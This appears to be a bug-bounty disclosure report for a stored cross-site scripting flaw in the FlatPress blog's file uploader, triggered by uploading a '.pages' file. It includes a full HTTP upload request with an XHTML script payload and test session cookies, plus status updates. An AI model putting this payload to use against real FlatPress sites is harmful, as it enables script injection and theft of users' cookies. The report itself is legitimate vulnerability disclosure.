Stored XSS via `.pages` File in in flatpressblog/flatpress
Valid
Reported on
Jan 2nd 2023
Description
When user upload a file with .pages extension and direct access this file, the server response with Content-type: application/octet-stream lead to processing .pages as HTML file. I only discovered this file extension doing more research on XSS
Proof of Concept
POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 2051
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGDdtfAjfJHeGw497
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/flatpress-master/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; fpuser_fp-9a36daaa=admin; fppass_fp-9a36daaa=%242y%2410%24k7Y2.YM02Q4HFMKnFhhtTea2.GpaY4XW8JL0U05O%2FTIkIvWg%2FfYyy; fpuser_fp-9b7fc0a2=admin; fppass_fp-9b7fc0a2=%242y%2410%24cxsAXo1XdfPxtztQL8Ehuei7Un1fUCqJG%2Fm7IeIyLG1PIdGXEvxwi; security_level=0; fpsess_fp-9a36daaa=cchci3ludjhp8frr6dleds54b8; fpsess_fp-9b7fc0a2=a0b4ht1pq923t7ao89lgo4fcgb
Connection: close
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wpnonce"
96b07d2bb9
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wp_http_referer"
/flatpress-master/admin.php?p=uploader
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload[]"; filename="xss.pages"
Content-Type: application/octet-stream
<?xml version="1.0" encoding="UTF-8"?>
<html>
<head></head>
<body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
</body>
</html>
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload"
Upload
------WebKitFormBoundaryGDdtfAjfJHeGw497--
Steps to take
Log in and then access /admin.php?p=uploader&action=default Perform .Pages file upload, using malicious javascript to steal user cookies.
Empirical evidence
https://drive.google.com/file/d/1PG8Tiz63Sw6rBeRDPDYrBo4PQjGyikL5/view?usp=sharing
Impact
This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...
We are processing your report and will contact the
flatpressblog/flatpress
team within 24 hours.
4 months ago
We have contacted a member of the
flatpressblog/flatpress
team and are waiting to hear back
4 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on
Mar 1st 2023
to join this conversation
